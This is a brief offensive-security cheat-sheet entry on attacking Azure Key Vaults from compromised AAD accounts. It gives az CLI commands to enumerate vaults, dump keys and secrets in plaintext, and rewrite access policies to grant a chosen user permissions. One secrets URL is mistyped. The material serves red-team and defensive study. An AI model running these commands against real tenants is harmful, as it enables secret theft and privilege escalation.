Attacking Key Vaults
While owning users and devices in AAD environments, it's good practice to look out for permissions like
Microsoft.KeyVault/vaults/read # read keys in a vault
Microsoft.KeyVault/vaults/secrets/read # read the plaintext passwords in a vault
Microsoft.KeyVault/vaults/accessPolicies/write # change access policies of vaults
To list the key vaults we have access to we use
PS /home/otter> az keyvault list
If we have the right permissions we can also list the keys and secrets stored in the vaults:
- keys are usually stored at
https://<keyvault_name>.vault.azure.net/keys/<key_name>
# list keys
PS /home/otter> az keyvault key list --vault-name <vault_name>
# show plaintext keys
PS /home/otter> az keyvault key show --vault-name <vault_name> -n <key_name>
- secrets are usually stored at
https://<keyvault_name>.vault.azure.ner/secrets/<secret_name>
# list secrets
PS /home/otter> az keyvault secret list --vault-name <vault_name>
# show plaintext secrets
PS /home/otter> az keyvault secret show --vault-name <vault_name> -n <secret_name> --query value -o tsv
If we compromised a user that can change the access policy for a vault we can delegate permissions to other users
PS /home/otter> az keyvault set-policy -n <vault_name> --key-permission get list --upn otter@minions.onmicrosoft.com